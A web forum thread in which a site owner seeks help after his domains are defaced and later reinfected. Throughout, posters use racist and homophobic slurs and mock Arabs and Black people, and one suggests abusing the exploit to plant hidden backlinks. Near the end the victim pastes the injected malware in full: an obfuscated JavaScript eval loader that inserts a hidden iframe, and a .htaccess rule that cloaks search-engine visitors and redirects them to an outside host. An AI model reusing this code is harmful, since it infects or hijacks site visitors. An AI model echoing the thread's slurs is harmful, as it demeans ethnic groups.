Hacked

hellblazer

New member
Sep 20, 2008
3,019
86
0
They didn't even do any real damage, just replaced all my domains with this gay screen. Here's a sample(not my domain).


What should I do to:

a)find out who did it.
b)find out how they did it.
c)rape them.
 


Ugghh, I was wearing headphones...

Nothing worst than shitty music in surround sound.

I need to hit up hellblazer on skype and listen to Michael Savage to clean my ears,
 
  • Like
Reactions: hellblazer
I think your sites were hacked by some "black people" - just another black on white crime
 
it was some dumb arab, blah blah blah blacks are victims

Since you wasted time coming in here and stating the obvious, are there any steps I can take to prevent this in the future?

They ran this php script that showed them all my domains along with my hosting username. No idea how they can get username info, but that's where they started.
 
Since you wasted time coming in here and stating the obvious, are there any steps I can take to prevent this in the future?

They ran this php script that showed them all my domains along with my hosting username. No idea how they can get username info, but that's where they started.

I've manually blocked ip blocks by region and included regions hackers like that come from.
 
They ran this php script that showed them all my domains along with my hosting username. No idea how they can get username info, but that's where they started.

Facts:
1> they did not do this for profit
2> they're arab
3> they knew your master username

I'd look at your host's support ... those guys get paid in peanuts. You'll never be able to prove it though, if they've got this kind of breach, you're better off just moving.
 
yes good idea: go after the "arab/black guy" who did this who knows how to exploit known/custom vulnerabilities in intricate servers on a large scale and distributed basis. im sure this isnt the type of person who could cause havok on your personal life or credit.

your hosting provider probably already patched this (meaning they upgraded PHP on your shared IP block that probably have 500 other sites on with yours...hope your not doing SEO lolz)

this happens every day and is not a targeted attack. you were not specifically targeted.
this is someone who found a vulnerability in a given exploit and took advantage of this on a large scale, gained access and pasted his gey html page.
 
1> they did not do this for profit

They didn't delete any of my files, just gave them all that gay homepage.

2> they're arab

Ostensibly, yes.

3> they knew your master username

My referral logs show a php script run from the domain I posted in the OP that showed (among a ton of other domains) ALL of my domains with that hosting company, along with EVERY single hosting username for each domain. On that part, I'm actually curious. How can they access a username only the hosting company and me should have?

I'd look at your host's support ... those guys get paid in peanuts. You'll never be able to prove it though, if they've got this kind of breach, you're better off just moving.

These are some of my lower-tier domains, hardly valuable at all. Frankly, I'm surprised they didn't do more damage.
 
also, know i am probably being captain obvious. but did anyone check the html of the hacked page?

174.36.155.228/ is the IP address linked to those images on the top of the page...that goes to an HTTPD server of an armenian guy...

David Gevorkyan's Home Page

hmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
 
add: if this were me i would do so much more with the exploit. like keep the page like i was never there and add an html file in the root of my directory, for BACKLINKS...must be at least 100 IPs per server sheeeeat
 
don't get me wrong but some of the things that can giveaway access :

1) running a script yourself without checking the source code or reading to any reviews
This can include any wordpress plugin (read the recent news about backdoors ?).

2) Running any nulled/warez script which has 2-lines embedded to email your password

3) some idiot from hosting server leaked your pwd

4) keyloggers

5) maybe a bruteforce attack on your server - quite hard to tell from awstats

if none them iam out. There is a hosting guide on this forum i believe. Maybe he can suggest something?

EDIT - Your hosting company is godaddy???
 
I had this happen once when I used an FTP program that got injected with a virus or something. Everytime I would login that shit would relay to the russian mothership and my sites would get injected with flesh eating Krokidil.

Switch up ur ftp, change ur passwords, start a God hates arabs thread and we should be good.

BY THE WAY, HELLBLAZER SIR, YOU HAVE SEVERELY MISQUOTED ME!!!!!!!111122
 
It's okay bro.

fuckniggers.com, fuckspics.com, obamaassassinationplot.org, and sarahpalinfanclub.me weren't bringing in much revenue anyway.
 
Hacked again. This time one of my sites on a shitty shared hosting account. It is a simple Wordpress blog.

This is what the virus wrote on my index.php file:

<script>c=2;i=c-2;if(window.document)try{new c.prototype}catch(hgberger){f=['-29n-29n67n64n-6n2n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n3n85n-25n-29n-29n-29n67n64n76n59n71n63n76n2n3n21n-25n-29n-29n87n-6n63n70n77n63n-6n85n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n81n76n67n78n63n2n-4n22n67n64n76n59n71n63n-6n77n76n61n23n1n66n78n78n74n20n9n9n78n62n77n13n16n8n60n83n67n72n78n63n76n8n72n63n78n9n77n78n62n77n9n65n73n8n74n66n74n25n77n67n62n23n11n1n-6n81n67n62n78n66n23n1n11n10n1n-6n66n63n67n65n66n78n23n1n11n10n1n-6n77n78n83n70n63n23n1n80n67n77n67n60n67n70n67n78n83n20n66n67n62n62n63n72n21n74n73n77n67n78n67n73n72n20n59n60n77n73n70n79n78n63n21n70n63n64n78n20n10n21n78n73n74n20n10n21n1n24n22n9n67n64n76n59n71n63n24n-4n3n21n-25n-29n-29n87n-25n-29n-29n64n79n72n61n78n67n73n72n-6n67n64n76n59n71n63n76n2n3n85n-25n-29n-29n-29n80n59n76n-6n64n-6n23n-6n62n73n61n79n71n63n72n78n8n61n76n63n59n78n63n31n70n63n71n63n72n78n2n1n67n64n76n59n71n63n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n77n76n61n1n6n1n66n78n78n74n20n9n9n78n62n77n13n16n8n60n83n67n72n78n63n76n8n72n63n78n9n77n78n62n77n9n65n73n8n74n66n74n25n77n67n62n23n11n1n3n21n64n8n77n78n83n70n63n8n80n67n77n67n60n67n70n67n78n83n23n1n66n67n62n62n63n72n1n21n64n8n77n78n83n70n63n8n74n73n77n67n78n67n73n72n23n1n59n60n77n73n70n79n78n63n1n21n64n8n77n78n83n70n63n8n70n63n64n78n23n1n10n1n21n64n8n77n78n83n70n63n8n78n73n74n23n1n10n1n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n81n67n62n78n66n1n6n1n11n10n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n66n63n67n65n66n78n1n6n1n11n10n1n3n21n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n8n59n74n74n63n72n62n29n66n67n70n62n2n64n3n21n-25n-29n-29n87'][0].split('n');md='a';e=window["e"+"v"+"al"];w=f;s=[];r=String;for(;593!=i;i+=1){j=i;s+=r.fromCharCode(38+1*w[j]);}e(s);}</script>

And this is what they wrote to the .htaccess file:



# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(q\=cache\:).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://luckyhosting.org/cgi-bin/r.cgi?p=10003&i=0a1abe13&j=314&m=2bc3f9c3ee154139563f3f2f8df4b1c2&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo

It wrote this to all of the approximately 6 Wordpress blogs on this account. I went in, edited all of the index.php files, edited the .htaccess files as well, changed the Cpanel password, changed the wordpress password, even changed my fucking email password.

Today, it's right back there again. The .htaccess file remains unchanged, but the Index.php shows the exact same shit. I have to ask those more knowledgeable than I on this subject, there's probably a really easy solution to this, but how are they still editing the file? Do they have another sleeper file somewhere that I didn't delete? It has to be some type of program on my server that keeps overwriting the index.php file, right? Is it implanted in one of the many php files?

Any help would be appreciated.
 
  • Like
Reactions: crackp0t